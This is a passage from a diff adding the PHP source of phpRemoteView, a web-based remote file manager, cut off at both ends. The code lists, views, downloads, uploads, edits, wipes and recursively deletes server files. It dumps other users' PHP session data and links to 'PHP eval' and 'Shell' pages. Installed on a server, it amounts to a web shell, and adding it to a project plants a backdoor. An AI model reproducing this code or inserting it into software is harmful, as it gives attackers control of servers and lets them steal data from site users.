"n": case "t": case "s": case "o": case "g": + case "a": case "c": case "1": case "2": case "3": + echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break; + default: + echo "??$cn[$i]??"; + } + if ($cc[0]==="$i") { + if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>"; + else echo "<img src=$self?c=img&name=sort_desc border=0>"; + } + echo '</a></td>'; + } + echo '</tr>'; + + echo "\n\n<script>\n\n"; + foreach ($names as $k=>$v) { + + echo "\n\n// $k \n"; + echo 'tr('; + + for ($i=0; $i<strlen($cn); $i++) { + + switch ($cn[$i]) { + + case 'n': + switch($ftype[$k]) { + case 'file': + $vv=strtolower(substr($k,strlen($k)-4,4)); + $add=""; + if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp" + || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1"; + if (substr($k,0,5)=="sess_") $add="&ftype=4"; + $ln='<a href='.$self.'?&c=v&d='.urlencode($d). + '&f='.urlencode($k).$add.'>'; + break; + + default: + $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>'; + break; + } + + if ($ftype[$k]=='dir') + $ln.='<img src='.$self.'?c=img&name=dir border=0>'; + else { + $found=0; + foreach ($ext as $kk=>$vv) { + if (in_array(strtolower($fext[$k]),$vv)) { + $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>'; + $found=1; + break; + } + } + if (!$found) + $ln.='<img src='.$self.'?c=img&name=unk border=0>'; + } + $ln.=substr($k,0,48).'</a>'; + echo jsval($ln); + + break; + + case "t": + switch ($ftype[$k]) { + case "dir": + echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); + break; + case "file": + echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=". + urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ". + "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>"); + break; + case "link": + echo jsval("<font class=t>&#8212;&gt;</font>"); + break; + default: + echo jsval("??"); + break; + } + break; + + case "s": + if ($ftype[$k]=='file') echo jsval(sizeparse($fsize[$k])); + else echo jsval(''); + break; + + case "o": + $tmp=@_posix_getpwuid($fowner[$k]); + if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k]; + else $tow=$tmp['name']; + echo jsval($tow); + break; + + case "g": + $tmp2=@_posix_getgrgid($fgroup[$k]); + if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k]; + else $tgr=$tmp2['name']; + echo jsval($tgr); + break; + + case "a": + $tmp=@_posix_getpwuid($fowner[$k]); + if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k]; + else $tow=$tmp['name']; + $tmp2=@_posix_getgrgid($fgroup[$k]); + if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k]; + else $tgr=$tmp2['name']; + echo jsval("$tow/$tgr"); + break; + + case "c": + echo jsval(display_perms($fperms[$k])); break; + + case "1": echo jsval(date($cp[2],$fctime[$k])); break; + + case "2": echo jsval(date($cp[2],$fmtime[$k])); break; + + case "3": echo jsval(date($cp[2],$fatime[$k])); break; + + default: echo "??$cn[$i]??"; + + } //switch ($ftype) + + }//for ($cn) + + echo "0);\n"; + + }//foreach ($names) + + echo "\n\n</script>\n\n\n"; + + echo '</td></tr></table></td></tr></table></td></tr></table>'; + + + echo "<P align=center> + <font size=1 style='Font: 8pt Verdana'><B> + <a href=$self?c=setup&ref=$uurl>".mm("Setup")."</a> | + <a href=$self?c=t>PHP eval</a> | + <a href=$self?c=phpinfo>phpinfo()</a> | + <a href=$self?c=t>Shell</a> | + <a href=$self?c=codes>".mm("Char map")."</a> | + ".mm("Language").": + <a href=$self?c=set&c2=eng&ref=$uurl&pan=0>".mm("English")."</a>/<a href=$self?c=set&c2=rus&ref=$uurl&pan=0>".mm("Russian")."</a> + + </b> + <hr size=1 noshade width=55%><center> + + <table border=0 cellspacing=0 cellpadding=0><tr><td width=32> + <font face=webdings style='Font-size: 22pt;'>&#0033;</font></td><td> + <font size=1 style='Font: 8pt Verdana'>phpRemoteView &copy; Dmitry Borodin (".mm("version")." $version)<br> + ".mm("Free download")." - <a href='http://php.spb.ru/remview/'>http://php.spb.ru/remview/</a></b></font></td> + </tr></table>"; + +break; + + +case "set": + + switch ($c2) { + case "sort": + $name=intval($name); + if ($name==$cc[0]) if ($cc[1]==='0') $cc[1]='1'; else $cc[1]='0'; + $cc[0]=$name; + break; + + case "panel": + $cn=''; + foreach ($names as $k=>$v) { + if ($v!="") $cn.=substr($v,0,1); + } + $cc[0]=substr($sort,0,1); + $cc[1]=substr($sortby,0,1); + $cp[2]=substr($datetime,0,50); + $cp[3]=substr($fontname,0,50); + $cp[4]=substr($fontsize,0,50); + + //exit("cn=$cn<br>cc=$cc"); + break; + + case "eng": + $cc[5]=1; + break; + + case "rus": + $cc[5]=2; + break; + + } + + + $cookie=$cc."~".$cn."~".$cp[2]."~".$cp[3]."~".$cp[4]; + if ($c2=="reset") $cookie=implode("~",$cp_def); + //echo "<script>alert('$cookie')</script>"; + setcookie("cp$pan",$cookie,time()+24*60*60*333,'/'); + header("Location: $ref"); + echo "<script>location.href=\"$ref\";</script>"; + //echo "[$ref]"; + //phpinfo(); + break; + + +case "setup": + + echo $GLOBALS['html']; + + echo "<center><h3><b>phpRemoteView ".mm("setup")."</b> [<A href='javascript:history.go(-1)'>".mm("back")."</a>]</h3></center><hr size=1 noshade>"; + + echo "<STYLE> + .setup { + font-size: 8pt; + font-family: Tahoma; + } + HTML, TD {font: 90%} + </STYLE>"; + + echo " + <b><u>".mm("Reset all settings")."</u></b>: <a href=$self?c=set&c2=reset&pan=$panel&ref=$ref>".mm("clear")."</a>"; + echo " <font color=white>(".mm("Current").": <small>".implode(" | ",$cp)."</small>)</font><P>"; + + echo " + <form action=$self method=post> + <input type=hidden name=c value=\"set\"> + <input type=hidden name=c2 value=\"panel\"> + <input type=hidden name=pan value=\"$panel\"> + <input type=hidden name=ref value=\"$ref\"> + "; + echo "<b><u>".mm("Colums and sort")."</u></b><br>"; + + echo "".mm("Sort order").": "; + echo "<input type=radio name=sortby value=0 id=q3 ".($cc[1]=='0'?"checked":"").">"; + echo "<label for=q3>".mm("Ascending sort")."</label>"; + echo "<input type=radio name=sortby value=1 id=q4 ".($cc[1]=='1'?"checked":"").">"; + echo "<label for=q4>".mm("Descending sort")."</label><br>"; + + echo "<input type=radio name=sort value='n' id=q1 ".($cc[0]=='n'?"checked":"").">"; + echo "<label for=q1>".mm("Sort by filename")."</label>"; + echo "<input type=radio name=sort value='e' id=q2 ".($cc[0]=='e'?"checked":"").">"; + echo "<label for=q2>".mm("Sort by filename extension")."</label>"; + echo "<table border=0 cellspacing=0 cellpadding=3>"; + for ($i=0; $i<2; $i++) { + echo "<tr>"; + for ($j=0; $j<7; $j++) { + $n=$j+$i*7; + echo "<td align=center><label for=$n>Sort by ".($n+1)."</label>"; + echo "<input type=radio name=sort value=$n id=$n ".($cc[0]=="$n"?"checked":"").">"; + echo "<br><select class=setup name=names[] size=".(count($cn_name)+1).">"; + echo "<option value=''>--hidden--"; + foreach ($cn_name as $kk=>$vv) + echo "<option value='$kk'".($n<strlen($cn) && $cn[$n]==$kk?" selected":"").">$vv"; + echo "</select>"; + } + echo "</tr>"; + } + echo "</table><P>"; + + echo "<b><u>".mm("Date/time format")."</u></b>: <input type=text name=datetime value=\"$cp[2]\"><br> + d - day, m - month, y - year2, Y - year4, H - hour, m - minute, s - second<P>"; + + echo "<b><u>".mm("Panel font & size")."</u></b>: + <input type=text name=fontname value=\"$cp[3]\" size=12> + <input type=text name=fontsize value=\"$cp[4]\" size=2>pt<P>"; + + echo "<P><center><input type=submit value='&nbsp; &nbsp; S &nbsp; U &nbsp; B &nbsp; M &nbsp; I &nbsp; T &nbsp; &nbsp;'></center></form>"; + + + echo "<hr size=1 noshade>"; + break; + + + +// view +case "v": + + + if (!isset($fnot)) $fnot=0; + if (!isset($ftype)) $ftype=0; + + if ($fnot==0) { + echo $GLOBALS['html']; + up($d,$f); + echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>"; + up_link($d,$f); + echo "<hr size=1 noshade>"; + } + if (!realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found").""); + if (!is_file($d.$f) || !$fi=@fopen($d.$f,"rb")) exit("<p><font color=red><b>".mm("access denied")."</b></font>"); + + if ($ftype==0 || $ftype==4) { + $buf=fread($fi,max(filesize($d.$f),$maxsize_fread)); + fclose($fi); + } + + + switch ($ftype) { + + case 0: + echo "<pre>".htmlspecialchars($buf)."</pre>"; + break; + + case 1: + readfile($d.$f); + break; + + case 2: + header("Content-type: image/gif"); + readfile($d.$f); + break; + + case 3: // download + + if (isset($fatt) && strlen($fatt)>0) { + $attach=$fatt; + header("Content-type: text/plain"); + } + else { + $attach=$f; + header("Content-type: phpspbru"); + } + header("Content-disposition: attachment; filename=\"$attach\";"); + readfile($d.$f); + break; + + case 4: // session + + echo "<xmp>"; + if (substr($f,0,5)=="sess_" && preg_match("!^sess_([a-z0-9]{32})$!i",$f,$ok)) { + ini_set("session.save_path",$d); + session_id($ok[1]); + session_start(); + print_r($HTTP_SESSION_VARS); + } + else { + print_r(unserialize($buf)); + } + echo "</xmp>";//<hr size=1 noshade><xmp>"; + break; + + } + + break; + + + + + + + +case "i": // information for FILE + + echo $GLOBALS['html']; + up($d,$f); + echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>"; + up_link($d,$f); + + if (!realpath($d.$f) || !file_exists($d.$f)) exit(mm("file not found")); + + echo "<P><big><b><tt>".htmlspecialchars($d.$f)."</tt></b></big><P>"; + echo "<table class=tab border=0 cellspacing=1 cellpadding=2>"; + echo "<tr class=tr><td>".mm("Size")." </td><td> ".filesize($d.$f)."</td></tR>"; + echo "<tr class=tr><td>".mm("Owner")."/".mm("Group")." </td><td> "; + $tmp=@_posix_getpwuid(fileowner($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." "; + else echo $tmp['name']." "; + $tmp=@_posix_getgrgid(filegroup($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f); + else echo $tmp['name']; + echo "<tr class=tr><td>".mm("FileType")." </td><td> ".filetype($d.$f)."</td></tr>"; + echo "<tr class=tr><td>".mm("Perms")." </td><td> ".display_perms(fileperms($d.$f))."</td></tr>"; + echo "<tr class=tr><td>".mm("Create time")." </td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>"; + echo "<tr class=tr><td>".mm("Access time")." </td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>"; + echo "<tr class=tr><td>".mm("MODIFY time")." </td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>"; + echo "</table><P>"; + + $fi=@fopen($d.$f,"rb"); + if ($fi) { + $str=fread($fi,$hexdump_lines*$hexdump_rows); + echo "<b>".mm("HEXDUMP PREVIEW")."</b>"; + $n=0; + $a0="00000000<br>"; + $a1=""; + $a2=""; + for ($i=0; $i<strlen($str); $i++) { + $a1.=sprintf("%02X",ord($str[$i])).' '; + switch (ord($str[$i])) { + case 0: $a2.="<font class=s2>0</font>"; break; + case 32: + case 10: + case 13: $a2.="&nbsp;"; break; + default: $a2.=htmlspecialchars($str[$i]); + } + $n++; + if ($n==$hexdump_rows) { + $n=0; + if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>"; + $a1.="<br>"; + $a2.="<br>"; + } + } + //if ($a1!="") $a0.=sprintf("%08X",$i)."<br>"; + echo "<table border=0 bgcolor=#cccccc cellspacing=1 cellpadding=4 ". + "class=sy><tr><td bgcolor=#e0e0e0>$a0</td><td bgcolor=white>". + "$a1</td><td bgcolor=white>$a2</td></tr></table><p>"; + } + + echo "<b>Base64: </b> + <nobr>[<a href=$self?c=base64&c2=0&d=".urlencode($d)."&f=".urlencode($f).">Encode</a>]&nbsp;</nobr> + <nobr>[<a href=$self?c=base64&c2=1&d=".urlencode($d)."&f=".urlencode($f).">+chunk</a>]&nbsp;</nobr> + <nobr>[<a href=$self?c=base64&c2=2&d=".urlencode($d)."&f=".urlencode($f).">+chunk+quotes</a>]&nbsp;</nobr> + <nobr>[<a href=$self?c=base64&c2=3&d=".urlencode($d)."&f=".urlencode($f).">Decode</a>]&nbsp;</nobr> + <P>"; + + + if (!$write_access) exitw(); + + $msg=""; + if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS")."</b></font>)"; + else fclose($fi); + if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied")."</b></font>)"; + else fclose($fi); + if ($msg=="") $msg=" (".mm("full read/write access").")"; + + echo "<b>".mm("FILE SYSTEM COMMANDS")."$msg</b><p>"; + + echo " +<table border=0 cellspacing=0 cellpadding=0><tr> + +<td bgcolor=#cccccc><a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f). +"><b>&nbsp;&nbsp;".mm("EDIT")."&nbsp;&nbsp;<br>&nbsp;&nbsp;".mm("FILE")."&nbsp;&nbsp;</b></a></td> +<td>&nbsp;&nbsp;&nbsp;</td> + +<td><form action=$self method=post> +<input type=hidden name=c value=delete> +<input type=hidden name=c2 value=delete> +<input type=hidden name=d value=\"".htmlspecialchars($d)."\"> +<input type=hidden name=f value=\"".htmlspecialchars($f)."\"> +<input type=submit value='".mm("DELETE")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br> +<small>".mm("Delete this file")."</small> +</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td> + +<td><form action=$self method=post> +<input type=hidden name=c value=delete> +<input type=hidden name=c2 value=clean> +<input type=hidden name=d value=\"".htmlspecialchars($d)."\"> +<input type=hidden name=f value=\"".htmlspecialchars($f)."\"> +<input type=submit value='".mm("CLEAN")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br> +<small>".mm("filesize to 0byte")."</small> +</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td> + +<td><form action=$self method=post> +<input type=hidden name=c value=delete> +<input type=hidden name=c2 value=touch> +<input type=hidden name=d value=\"".htmlspecialchars($d)."\"> +<input type=hidden name=f value=\"".htmlspecialchars($f)."\"> +<input type=submit value='".mm("TOUCH")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br> +<small>".mm("Set current 'mtime'")."</small> +</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td> + +<td><form action=$self method=post> +<input type=hidden name=c value=delete> +<input type=hidden name=c2 value=wipe> +<input type=hidden name=d value=\"".htmlspecialchars($d)."\"> +<input type=hidden name=f value=\"".htmlspecialchars($f)."\"> +<input type=submit value='".mm("WIPE(delete)")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br> +<small>".mm("Write '0000..' and delete")."</small> +</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td> +</tr></table> +"; + + echo "<form action=$self method=post><input type=hidden name=c value=copy>". + "<b>".mm("COPY FILE")."</b> ".mm("from")." <input type=text size=40 name=from value=\"".htmlspecialchars($d.$f)."\">". + " ".mm("to")." <input type=text name=to size=40 value=\"".htmlspecialchars($d.$f)."\">". + "<nobr><input type=submit value='".mm("COPY")."!'>". + "&gt;<input type=checkbox name=confirm value=copy></nobr></form>"; + +echo " +<form action=$self method=post> +<b>".mm("MAKE DIR")."</b> (".mm("type full path").") +<input type=hidden name=c value=newdir_submit> +<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\"> +<input type=submit value='".mm("MkDir")."'> +</form>"; + + +echo " +<form action=$self method=post> +<b>".mm("CREATE NEW FILE or override old file")."</b><br> +<input type=hidden name=c value=newfile_submit> +".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d.$f)."\"> +<input type=submit value='".mm("CREATE/OVERRIDE")."'> +<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br> +<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br> +</form>"; + +echo " +<form enctype='multipart/form-data' action='$self' method=post> +<input type=hidden name=c value=fileupload_submit> +<b>FILE UPLOAD: ".mm("CREATE NEW FILE or override old file")."</b><br> +<input type=hidden name='MAX_FILE_SIZE' value=999000000> +1. ".mm("select file on your local computer").": <input name=userfile type=file><br> +2. ".mm("save this file on path").": + <input name=df size=50 value=\"$d$f\"><br> +3. <input type=checkbox name=df2 value=1 id=df2 checked> + <label for=df2>".mm("create file name automatic")."</label> + &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp; + ".mm("type any file name").": + <input name=df3 size=20><br> +4. <input type=checkbox name=df4 value=1 id=df4> + <label for=df4>".mm("convert file name to lovercase")."</label><br> +<input type=submit value='".mm("Send File")."'> +</form>"; + +break; + + +case "base64": + + echo "<pre>\n"; + $ff=fopen($d.$f,"rb") or exit("<p>access denied"); + $text=fread($ff,max(filesize($d.$f),$maxsize_fread)); + fclose($ff); + switch ($c2) { + case 0: + echo base64_encode($text); + break; + case 1: + echo chunk_split(base64_encode($text)); + break; + case 2: + $text=base64_encode($text); + echo substr(preg_replace("!.{1,76}!","'\\0'.\n",$text),0,-2); + break; + case 3: + echo base64_decode($text); + break; + } + break; + + + +case "d": // information for DIRECTORY + + echo $GLOBALS['html']; + up($d,"","Directory"); + echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>"; + echo "<p>"; + + //up_link($d,""); + + if (!realpath($d) || !is_dir($d.$f)) exit(mm("dir not found")); + + echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>"; + + echo "<table border=0 cellspacing=1 cellpadding=1 class=tab>"; + echo "<tr class=tr><td>&nbsp;&nbsp;&nbsp;".mm("Owner")."/".mm("Group")."&nbsp;&nbsp;&nbsp;</td><td>"; + $tmp=@_posix_getpwuid(fileowner($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." "; + else echo $tmp['name']." "; + $tmp=@_posix_getgrgid(filegroup($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f); + else echo $tmp['name']; + echo "</td></tr><tr class=tr><td>"; + echo mm("Perms")."</td><td>".display_perms(fileperms($d.$f))."</td></tr><tr class=tr><td>"; + echo mm("Create time")."</td><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr class=tr><td>"; + echo mm("Access time")."</td><td>".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr class=tr><td>"; + echo mm("MODIFY time")."</td><td>".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>"; + + echo "</tD><form action=$self method=get><td width=70>&nbsp;</td><td> + <input type=hidden name=c value=\"tree\"> + Root <input type=text name=d value=\"$d\"><br> + <input type=checkbox name=showfile value=1 id=tree1><label for=tree1>Show files in tree</label><br> + <input type=checkbox name=showsize value=1 id=tree2 checked><label for=tree2>Show dir/files size</label><br> + <input type=submit value='Show TREE directory'>"; + + echo "</td></form></tr></table><P>"; + + + + if (!$write_access) exitw(); + + echo "<b>".mm("FILE SYSTEM COMMANDS")."</b><p>"; + + echo " +<table border=0 cellspacing=0 cellpadding=0><tr> + +<td><form action=$self method=post> +<input type=hidden name=c value=dirdelete> +<input type=hidden name=c2 value=files> +<input type=hidden name=d value=\"".htmlspecialchars($d)."\"> +<input type=hidden name=ref value=\"$url\"> +<input type=submit value='".mm("Delete all files in dir")." (rm *)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr> +</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td> + +<td><form action=$self method=post> +<input type=hidden name=c value=dirdelete> +<input type=hidden name=c2 value=dir> +<input type=hidden name=d value=\"".htmlspecialchars($d)."\"> +<input type=hidden name=ref value=\"$url\"> +<input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr> +</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td> + +</tr></table> +"; + +echo " +<form action=$self method=post> +<b>".mm("MAKE DIR")."</b> (type full path) +<input type=hidden name=c value=newdir_submit> +<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\"> +<input type=submit value='".mm("MkDir")."'> +</form>"; + + +echo " +<form action=$self method=post> +<b>".mm("CREATE NEW FILE or override old file")."</b><br> +<input type=hidden name=c value=newfile_submit> +".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d)."\"> +<input type=submit value='".mm("CREATE/OVERRIDE")."'> +<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br> +<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br> +</form>"; + +echo " +<form enctype='multipart/form-data' action='$self' method=post> +<input type=hidden name=c value=fileupload_submit> +<b>(FILE UPLOAD) ".mm("CREATE NEW FILE or override old file")."</b><br> +<input type=hidden name='MAX_FILE_SIZE' value=999000000> +1. ".mm("select file on your local computer").": <input name=userfile type=file><br> +2. ".mm("save this file on path").": + <input name=df size=50 value=\"".realpath($d)."/\"><br> +3. <input type=checkbox name=df2 value=1 id=df2 checked> + <label for=df2>".mm("create file name automatic")."</label> + &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp; + ".mm("type any file name").": + <input name=df3 size=20><br> +4. <input type=checkbox name=df4 value=1 id=df4> + <label for=df4>".mm("convert file name to lovercase")."</label><br> +<input type=submit value='".mm("Send File")."'> +</form>"; + + +break; + + + +case "tree": + +$tcolors=array( +'eee','ddd','ccc','bbb','aaa','999','888','988','a88','b88','c88','d88','e88','d98', +'ca8','bb8','ac8','9d8','8e8','8d9','8ca','8bb','8ac','89d','88e'); + +function dir_tree($df,$level=0) { + global $tcolors,$self; + + $df=str_replace("//","/",$df); + $dirs=array(); + $files=array(); + if ($dir=opendir($df)) { + while (($file=readdir($dir))!==false) { + if ($file=="." || $file=="..") continue; + if (is_dir("$df/$file")) { + $dirs[]=$file; + } + else { + $files[]=$file; + } + } + } + closedir($dir); + + sort($dirs); + sort($files); + + $i=min($level,count($tcolors)-1); + $c=$tcolors[$i][0].$tcolors[$i][0].$tcolors[$i][1].$tcolors[$i][1].$tcolors[$i][2].$tcolors[$i][2]; + + echo "\r\n\r\n\r\n + <table width=100% border=0 cellspacing=2 cellpadding=1><tr><td bgcolor=#000000> + <table width=100% border=0 cellspacing=0 cellpadding=1 bgcolor=#$c> + <tr><td colspan=3 class=dir>". + "<a href=$self?c=l&d=".urlencode($df)." class=dir><img src=$self?name=dir&c=img&1 border=0>". + $df."</a></td></tr>"; + + if (count($dirs) || count($files)) { + echo "<tr><td width=15>&nbsp;</td><td class=all width=97%>"; + for ($i=0; $i<count($files); $i++) { + echo $files[$i]." "; + } + for ($i=0; $i<count($dirs); $i++) { + dir_tree($df."/".$dirs[$i],$level+1); + } + echo "</td><td width=10>&nbsp;</td></tr>"; + } + echo '</table></td></tr></table>'; +} + + echo " + <STYLE> + .all { + font-family: Verdana; + font-size: 80%; + } + .dir { + font-family: Verdana; + font-size: 95%; + background: #666699; + font-weight: bold; + color: white + } + </STYLE>"; + echo $GLOBALS['html']; + + up($d,"","Directory"); + echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>"; + echo "<p>"; + dir_tree($d); + break; + + + +case "delete": + + if (!$write_access) exitw(); + + if (!isset($c2)) exit("err# delete 1"); + if (!isset($confirm) || strlen($confirm)<3) exit("".mm("Confirm not found (go back and set checkbox)").""); + echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a><p>"; + if (!isset($d) || !isset($f) || !@file_exists($d.$f) || !@realpath($d.$f)) + exit("".mm("Delete cancel - File not found").""); + if (realpath(getenv("SCRIPT_FILENAME"))==$d.$f && !isset($delete_remview_confirm)) + exit(mm("Do you want delete this script (phpRemoteView) ???")."<br><br><br><br> + <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".urlencode($f)."&delete_remview_confirm=YES'>[".mm("YES").", ".mm("DELETE")." <b>".mm("ME")."</b>]</a> + &nbsp; &nbsp; &nbsp; + <a href='javascript:history.back(-1)'>[".mm("NO (back)")."]</a>"); + + switch ($c2) { + case "delete": + //exit("$d $f"); + ob(); + if (!unlink($d.$f)) + obb().exit("<font color=red><b>".mm("Delete cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); + Header("Location: $self?c=l&d=".urlencode($d)); + echo "<P><a href=$self?c=l&d=".urlencode($d).">".mm("done (go back)")."!</a><p>"; + echo "".mm("Delete ok").""; + break; + case "touch": + ob(); + if (!touch($d.$f)) + obb().exit("<font color=red><b>".mm("Touch cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); + Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f)); + echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>"; + echo "".mm("Touch ok (set current time to 'modify time')").""; + break; + case "clean": + ob(); + $fi=fopen($d.$f,"w+") or + obb().exit("<font color=red><b>".mm("Clean (empty file) cancel")." - ".mm("ACCESS DENIED")."</b></font>obb"); + ftruncate($fi,0); + fclose($fi); + Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f)); + echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>"; + echo "".mm("Clean ok (file now empty)").""; + break; + case "wipe": + $size=filesize($d.$f); + ob(); + $fi=fopen($d.$f,"w+") or + obb().exit("<font color=red><b>".mm("Wipe cancel - access denied")."</b></font>$obb"); + $str=md5("phpspbru".mt_rand(0,999999999).time()); + for ($i=0; $i<5; $i++) $str.=$str; // strlen 1024 byte + for ($i=0; $i<intval($size/1024)+1; $i++) fwrite($fi,$str); + fclose($fi); + ob(); + if (!unlink($d.$f)) + obb().exit("err# delete 2 - file was rewrite, but not delete...(only write access, delete disable)$obb"); + Header("Location: $self?c=l&d=".urlencode($d)); + echo "<a href=$self?c=i&d=".urlencode($d).">".mm("done (go back)")."!</a><p>"; + echo "".mm("Wipe ok (file deleted)").""; + break; + } + + //Header("Location: $self?c=l&d=".urlencode(dirname($df))); + //echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>"; + + break; + + +case "dirdelete": + + if (!$write_access) exitw(); + +function dir_delete($df) { + echo "<b>".basename($df)."</b><ul>"; + if ($dir=opendir($df)) { + $i=0; + while (($file=readdir($dir))!==false) { + if ($file=="." || $file=="..") continue; + if (is_dir("$df/$file")) { + dir_delete($df."/".$file); + } + else { + echo "$file<br>"; + echo "".mm("DELETE")." <tt>$df/$file</tt> ...<br>"; + unlink($df."/".$file); + } + $i++; + } + //if ($i==0) echo "-empty-<br>"; + } + closedir($dir); + echo "</ul>"; + echo "".mm("DELETE")." ".mm("DIR")." <tt>$df</tt> ...<br>"; + rmdir("$df/$file"); +} + + if (!isset($c2)) exit("error dirdelete 1"); + if (!isset($confirm)) exit("".mm("Confirm not found (go back and set checkbox)")."!"); + $df="$d"; + + switch ($c2) { + + case "files": + echo "<h3>".mm("Deleting all files in")." <tt>$df</tt> ...</h3>"; + if ($dir=opendir($df)) { + while (($file=readdir($dir))!==false) { + if ($file=="." || $file=="..") continue; + if (is_dir($df.$file)) { + echo "<big><tt><b>>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>"; + } + elseif (is_file($df.$file)) { + echo "<big><tt><b><font color=red>$file</font></b></tt></big> ".mm("deleting")."..."; + unlink($df.$file); + echo "<br>"; + } + else { + echo "<big><tt><b>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>"; + } + } + } + closedir($dir); + $ref="$self?c=l&d=".urlencode($d); + break; + + case "dir": + echo "<h3>".mm("Deleting all dir/files (recursive) in")." <tt>$df</tt> ...</h3>"; + dir_delete($df); + $ref="$self?c=l&d=".urlencode(realpath($d."/..")); + break; + } + //header("Location: $ref"); + echo "<p><a href=$ref>".mm("DONE, go back")."</a>"; + break; + +case "copy": + + if (!$write_access) exitw(); + + if (!isset($from) || !@file_exists($from) || !@realpath($from)) + exit("err# copy 1, file [$from] not found"); + if (!isset($to) || strlen($to)==0) + exit("err# copy 2, file [$to] not found"); + echo "Copy: ....<hr size=1 noshade>"; + if (!copy($from,$to)) { + echo "<hr size=1 noshade><font color=red><b>Error!</b></font><p>"; + echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."<p>"; + } + else + echo "".mm("DONE")."!<p>"; + echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."</a> (dir 'from')<p>"; + echo "View <a href=$self?c=l&d=".urlencode(dirname($to)).">".dirname($to)."</a> (dir 'to')<p>"; + break; + + + + +case "e": // edit + + if (!$write_access) exitw(); + + if (!@realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found").""); + echo $GLOBALS['html']; + up($d,$f); + echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>"; + up_link($d,$f); + $msg=""; + if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS (don't 